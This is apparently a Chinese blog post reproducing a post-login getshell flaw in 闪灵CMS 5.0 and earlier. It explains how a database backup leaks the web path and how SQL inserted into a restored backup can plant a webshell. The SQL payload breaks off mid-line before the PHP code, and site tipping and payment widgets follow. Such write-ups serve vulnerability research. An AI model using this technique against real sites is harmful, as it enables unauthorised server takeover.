【漏洞复现】闪灵CMS_5.0后台数据库备份Getshell

影响范围

闪灵CMS <=5.0

漏洞类型

数据库文件备份导致GetShell

利用条件

登陆后台管理账号+安装数据备份插件

漏洞概述

经测试,发现闪灵CMS后台运行备份当前数据库文件且备份名称中包含当前网站的web物理路径,同时允许上传本地备份的数据库文件,攻击者在登陆后台账号的情况下可以先备份当前数据库文件到本地,之后在数据库备份文件中插件恶意代码,之后再通过数据库恢复来getshell~

漏洞复现

首先,备份数据库文件到本地:

从数据库备份文件名中直接可以获取网站的物理路径信息:

之后在备份数据库文件中插入SQL语句:

DROP TABLE IF EXISTS `SL_shell`;
CREATE TABLE IF NOT EXISTS `SL_shell` (`cmd` longtext NOT NULL);
insert INTO SL_shell VALUES('<?ph
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值